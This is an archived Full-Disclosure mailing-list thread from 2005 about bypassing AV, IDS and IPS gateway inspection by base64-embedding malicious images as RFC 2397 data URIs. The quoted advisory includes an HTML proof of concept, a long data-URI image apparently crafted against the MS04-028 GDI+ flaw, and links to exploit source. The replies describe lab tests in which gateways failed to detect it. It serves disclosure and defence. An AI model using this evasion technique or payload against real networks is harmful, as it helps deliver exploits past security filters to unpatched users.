lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
From: stevenrakick at yahoo.com (Steven Rakick)
Subject: Multi-vendor AV gateway image inspection bypass
	vulnerability

At this point I have no choice by to agree. 

So far I've had an opportunity to test this with Check
Point Interspect and McAfee IntruShield. Like you
said, (in my lab) both detected and block the
malicious image when it was formatted without RFC
2397, but when base64 encoded they were downloaded and
excuted there attack.

Basically it's looking like no security companies are
looking at data formatted in this fashion. I'm not
sure but it seems like you can probably transfer
anything you'd like by just changing the content type
and your anti-virus, IDS, application firewall or
whatever you're using at the network level would be
completely oblivious.






On Tue, 11 Jan 2005 14:58:43 -0500, Darren Bounds
<lists@...rusense.com> wrote:
> Hello Danny,
> 
> This vulnerability is only applicable to the HTTP
data while in
> transit. Once received by the client the image will
be rendered and
> subsequently detected if local AV software.
> 
> At the present time, I'm not aware of any AV, IDS or
IPS vendor that
> will detect malicious images imbedded in HTML in
this manner.
> 
> 
> Thank you,
> 
> Darren Bounds
> Intrusense, LLC.
> 
> --
> Intrusense - Securing Business As Usual
> 
> On Jan 11, 2005, at 2:14 PM, Danny wrote:
> 
> > On Mon, 10 Jan 2005 14:08:11 -0500, Darren Bounds
> > <dbounds@...rusense.com> wrote:
> >> -----BEGIN PGP SIGNED MESSAGE-----
> >> Hash: SHA1
> >>
> >> Multi-vendor AV gateway image inspection bypass
vulnerability
> >> January 10, 2005
> >>
> >> A vulnerability has been discovered which allows
a remote attacker to
> >> bypass anti-virus
> >> (as well other security technologies such as IDS
and IPS) inspection
> >> of
> >> HTTP image content.
> >>
> >> By leveraging techniques described in RFC 2397
for base64 encoding
> >> image content within
> >> the URL scheme. A remote attack may encode a
malicious image within
> >> the
> >> body of an HTML
> >> formatted document to circumvent content
inspection.
> >>
> >> For example:
> >>
> >>
http://www.k-otik.com/exploits/09222004.ms04-28-cmd.c.php
> >>
> >> The source code at the URL above will by default
create a JPEG image
> >> that will attempt (and fail
> >> without tweaking) to exploit the Microsoft
MS04-028 GDI+
> >> vulnerability.
> >> The image itself is detected
> >> by all AV gateway engines tested (Trend, Sophos
and McAfee), however,
> >> when the same image
> >> is base64 encoded using the technique described
in RFC 2397
> >> (documented
> >> below), inspection
> >> is not performed and is delivered rendered by the
client.
> >>
> >> While Microsoft Internet Explorer does not
support the RFC 2397 URL
> >> scheme; Firefox, Safari,
> >> Mozilla and Opera do and will render the data and
thus successfully
> >> execute the payload if the necessary
> >> OS and/or application patches have not been
applied.
> >>
> >> ## BEGIN HTML ##
> >>
> >> <html>
> >> <body>
> >> <img
> >>
src="data:image/gif;base64,/9j/4AAQSkZJRgABAQEAYABgAAD//
> >> gAARXhpZgAASUkqAAgAHPD9f0FBQUGWAgAAGgAAABzw
> >> /
> >>
X9BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
> >> B
> >>
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
> >> FB
> >>
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
> >> FB
> >>
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
> >> FB
> >>
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
> >> FB
> >>
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
> >> FB
> >>
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
> >> FB
> >>
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
> >> FB
> >>
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
> >> FB
> >>
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
> >> FB
> >>
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
> >> FB
> >>
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
> >> FB
> >>
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
> >> FB
> >>
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
> >> FB
> >>
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
> >> FB
> >>
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
> >> FB
> >>
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
> >> FB
> >>
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
> >> FB
> >>
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQQAAAP/
> >> bAEMACAYGBwYFCAcHBwkJ
> >>
CAoMFA0MCwsMGRITDxQdGh8eHRocHCAkLicgIiwjHBwoNyksMDE0NDQfJzk9ODI8LjM0Mv
> >> /b
> >>
AEMBCQkJDAsMGA0NGDIhHCEyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj
> >> Iy
> >> MjIyMjIyMjIyMjIyMv/AABEIAAMAAwMBIgACEQEDEQH/
> >> xAAfAAABBQEBAQEBAQAAAAAAAAAA
> >> AQIDBAUGBwgJCgv/
> >>
xAC1EAACAQMDAgQDBQUEBAAAAX0BAgMABBEFEiExQQYTUWEHInEUMoGR
> >>
oQgjQrHBFVLR8CQzYnKCCQoWFxgZGiUmJygpKjQ1Njc4OTpDREVGR0hJSlNUVVZXWFlaY2
> >> Rl
> >>
ZmdoaWpzdHV2d3h5eoOEhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExc
> >> bH
> >> yMnK0tPU1dbX2Nna4eLj5OXm5+jp6vHy8/T19vf4+fr/
> >> xAAfAQADAQEBAQEBAQEBAAAAAAAA
> >> AQIDBAUGBwgJCgv/
> >>
xAC1EQACAQIEBAMEBwUEBAABAncAAQIDEQQFITEGEkFRB2FxEyIygQgU
> >>
QpGhscEJIzNS8BVictEKFiQ04SXxFxgZGiYnKCkqNTY3ODk6Q0RFRkdISUpTVFVWV1hZWm
> >> Nk
> >>
ZWZnaGlqc3R1dnd4eXqCg4SFhoeIiYqSk5SVlpeYmZqio6Slpqeoqaqys7S1tre4ubrCw8
> >> TF
> >>
xsfIycrS09TV1tfY2dri4+Tl5ufo6ery8/T19vf4+fr/2gAMAwEAAhEDEQA/
> >> APn+iiigD//
> >> Z">
> >> </body>
> >> </html>
> >>
> >> ## END HTML ##
> >>
> >> Solution:
> >>
> >> While AV vendor patches are not yet available,
fixes for all currently
> >> known image vulnerabilities are
> >> and have been for several months.  If you have
not yet applied them,
> >> you have your own
> >> negligence to blame.
> >>
> >> Contributions:
> >>
> >> Thanks to Scott Roeder and Jacinto Rodriquez
their assistance in
> >> platform testing.
> >
> > I believe TrendMicro's OfficeScan (client-server
scanner) will catch
> > it, but I am not sure about their gateway device.
What was their
> > response?
> >
> > ...D
> 
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter:
http://lists.netsys.com/full-disclosure-charter.html
> 


=====


__________________________________________________
Do You Yahoo!?
Tired of spam?  Yahoo! Mail has the best spam protection around 
http://mail.yahoo.com

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ